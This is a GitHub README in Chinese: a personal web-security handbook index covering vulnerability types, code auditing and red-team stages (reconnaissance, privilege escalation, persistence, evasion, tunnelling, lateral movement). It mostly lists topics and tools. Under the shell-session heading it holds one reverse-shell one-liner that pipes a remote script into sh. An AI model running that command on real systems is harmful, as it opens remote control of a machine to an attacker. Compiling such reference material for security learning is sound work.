Skip to content

Latest commit

 

History

History
433 lines (374 loc) · 21.2 KB

README.md

File metadata and controls

433 lines (374 loc) · 21.2 KB

WEB 安全手册

【声明】个人的快速查询目录,经验整理,仅供参考。
【内容】包括个人对漏洞理解、漏洞利用、代码审计和渗透测试的整理,也收录了他人相关的知识的总结和工具的推荐。

目录

0x00 技能栈

依照红队的流程分工,选择适合自己的技能栈发展。

越接近中心的能力点越贴近web技术栈,反之亦然。可以根据自身情况,选择技术栈的发展方向。

0x01 漏洞理解篇(Vulnerability)

1.1 前端

同源策略 & CSP & JOSNP

1.2 后端

应用分层 & 漏洞分类

1.3 打造自己的知识库

爬取范围包括先知社区、安全客、Seebug Paper、跳跳糖、奇安信攻防社区、棱角社区

0x02 漏洞利用篇(Exploit)

2.1 前端安全-XSS

XSS 利用的是用户对指定网站的信任

2.2 前端安全-CSRF

CSRF 利用的是网站对用户网页浏览器的信任

2.9 Server-side request forgery (SSRF)

2.4 [注入]SQL注入&数据库漏洞利用

MySQL,Oracle,MSSQL和PostgreSQL的OOB方法

go写的命令行版本

程序检测参数不能为空,导致空口令无法利用

2.5 [注入]模板注入 Server Side Template Injection (SSTI)

MVC架构中,模板参数恶意输入产生的安全问题

2.6 [注入]命令注入&代码执行

2.7 [注入]Xpath注入

XPath 即为 XML 路径语言

2.8 XML External Entity (XXE)

2.9 文件操作漏洞

远古时期的通杀利器

2.10 反序列化漏洞

php,java只能序列化数据,python可以序列化代码。

拓展payload和添加脏数据绕过waf功能

2.11 包含漏洞

2.12 Java-特性漏洞

Confluence和Struct2都使用OGNL

按照清单做的配套工具

2.13 NodeJs-特性漏洞

2.14 不一致性

利用前后DNS解析的不一致(劫持或者逻辑问题)

前后端不一致性

0x03 代码审计篇(Audit)

3.1 PHP

vscode&phpstorm方案,xdebug2.X和xdebug3.X配置

3.2 JAVA

自己整理的Java代码审计

3.3 .NET

3.4 Perl CGI

Perl CGI快速上手,了解Perl语言特性

0x04 渗透篇(Penetration)

【流程】网络预置(准备&信息收集)-->网络接入(外网突破)-->权限获取和提升-->权限维持(后门)-->后渗透
【基础】---免杀+++反溯源+++协同---

4.1 网络预置

4.1.1 代理客户端(环境准备)

操作系统 on VM + OpenWrt网关 on VM = 全局跳板

全局代理,虚拟网卡,需要手动配路由

SSTap全局代理也是基于虚拟网卡方案,可惜已停止更新,推荐使用1.0.9.7版本

【推荐!】Clash for Windows支持TAP模式基于虚拟网卡方案,走全局

Proxifier 全局代理支持并不好,可以设置规则选择指定程序走代理或直连

4.1.2 常规信息(单兵)

有域名层级图,更直观

4.1.3 资产搜索引擎(大数据)

4.1.4 移动端信息收集

从移动端拓展目标信息

4.1.5 近源渗透(WiFi)

高通410随身wifi改造

4.2 网络接入(exp)

4.2.1 漏洞验证(扫描器)

工欲其善必先利器

4.2.1.1 主动式
4.2.1.2 被动式

将Burpusuite打造成一个被动式扫描器

4.2.2漏洞利用(1day)

4.2.2.1 漏洞利用知识

IoT安全 & web安全& 系统漏洞 1day整理

4.2.2.2 漏洞利用工具

oa

struts2:利用功能已删除,仅支持检测

struts2:GUI,功能齐全

shiro:GUI,支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测

shiro:Python,方便修改代码,支持2种加密格式

fastjson

fastjson:各类poc,方便手动测试

exchange:爆破

confluence

4.2.2.3 dnslog平台

用于出网检测,无回显命令执行检测

【推荐!】好用,开源

4.2.3 字典

全拼用户名10w

4.3 权限获取&提升

4.3.1 Win

权限获取:

离线|在线|破解

提权:

已经停止更新到CVE-2018

4.3.2 Linux

权限获取:

提权:

已经停止更新到CVE-2018

4.3.3 Docker&Sandbox逃逸

4.4 权限维持&后门

4.4.1 通用

backdoor生成,meterpreter操作指令

4.4.2 Shell会话

curl https://reverse-shell.sh/192.168.0.69:1337 | sh

4.4.2 Webshell

4.4.3 PC & Server

4.4.4 Mobile (Android & ios)

4.5 免杀

4.5.1 二进制免杀

shellcode加载器
kill杀软
rootkit

4.5.2 webshell免杀和WAF逃逸

4.6 隧道&代理

4.6.1 TCP隧道

FRP 客服端和服务端配合的端口转发工具

Venom 可以嵌套多层代理,适合多层无外网的渗透测试,停止更新

【推荐!】比Venom更加稳定,持续更新

4.6.2 HTTP隧道

HTTP代理,国内更新维护

HTTP代理,号称性能是neo的10倍

4.6.3 DNS隧道

4.6.3 ICMP隧道

4.7 后渗透

4.7.1 内网信息获取&执行

信息获取 & 远程文件操作 & 远程执行命令 & ipc$ & wmi & winrm

超强神器,wmi,smb等执行脚本,python方便liunx使用

可以提取流量中用户名&密码,NTML Hash,图片等,以及绘制网络拓扑。

Windows rdp相关的登录记录导出工具。

Xshell在本地保存的密码进行解密

4.7.2 轻量级扫描工具

内网扫描神器,go语言跨平台,效率快,支持各类口令爆破,还有主机识别和web服务识别。

k8 team的内网扫描器

4.7.3 渗透框架

4.7.4 域渗透

  • 域渗透@uknowsec
  • 域提权:MS14-068,CVE-2020-1472(Zerologon),CVE-2021-42287/CVE-2021-42278,CVE-2022-26923

4.7.5 云平台

k8s渗透

通过accesskey获取相关主机权限执行命令

4.8 反溯源

4.9 协同

简单,美观

Other

toc目录生成工具

Star History Chart